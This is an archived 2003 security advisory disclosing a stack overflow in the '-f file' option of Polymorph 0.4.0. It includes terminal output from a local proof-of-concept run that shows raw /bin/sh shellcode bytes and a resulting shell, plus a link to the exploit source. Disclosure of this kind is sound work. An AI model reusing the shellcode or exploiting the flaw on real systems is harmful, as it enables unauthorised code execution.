Lucene search
SecurityvulnsSECURITYVULNS:DOC:4569HistoryMay 23, 2003 - 12:00 a.m.
Bug found in: Polymorph 0.4.0
2003-05-2300:00:00
vulners.com
12
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1
01100011 - code 'security research team'
-
- Advisory and PoC exploit by: demz // [email protected]
-
- Vulnerable source: Polymorph v0.4.0
-
- Bug type: Stackoverflow
-
- Priority: 3
[01] Description
[02] Vulnerable
[03] Proof of concept
[04] Vendor response
[01] Description
Polymorph is a filesystem "unixier" (a Win32 -> Unix filename convertor)
When downloading images from Usenet alot of filenames are mangled by MS Outlook
and other, less caring, newsagents.
There could be files with strange names like C:\\PIX\\HUBBLE\\Eagle\ Nebula\ 0532.JPG
and this, of course, is unacceptable.
Polymorph looks in the current working directory and finds strange filenames like this.
It then renames the file after converting all the characters to lowercase and
trimming the cruft from the original.
The previous example turned out to have the name eagle_nebula_0532.jpg which is
much more useful.
Polymorph contains an unchecked buffer in the "-f file" option,
this can be exploited very simple.
[02] Vulnerable
Vulnerable and exploitable version, tested on Redhat 8.0:
- Polymorph 0.4.0
Maybe also prior versions are vulnerable.
Source can be found at: http://chromebob.com/proj/polymorph.html
[03] Proof of concept
[demz@lab polymorph-0.4.0]$ ./c-polymorph
Polymorph 0.4.0 local exploit
---------------------------------------- demz @ c-code.net --
polymorph had trouble converting
1À1Û1É°FÍ€1ÀPhn/shh//bi‰ãPS‰á™°
Í€1À°ÍÁ% to
1À1Û1É°fÍ€1Àphn/shh//bi‰ãps‰á™°
Í€1À°Í  ðóÿ¿...
the file is now possibly corrupt
sh-2.05b$
A proof of concept exploit can be found at:
http://www.c-code.net/Releases/Exploits/c-polymorph.c
[04] Vendor response
The vendor is informed.
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.2.1 (GNU/Linux)
iD8DBQE+zTzZ8ToiGqnwMzARAphBAJ9L+MOY5R5arOeb1slTXeNgYAgwsgCcD8od
IwAUN0zzl8ZhkfZN5judNNY=
=oc09
-----END PGP SIGNATURE-----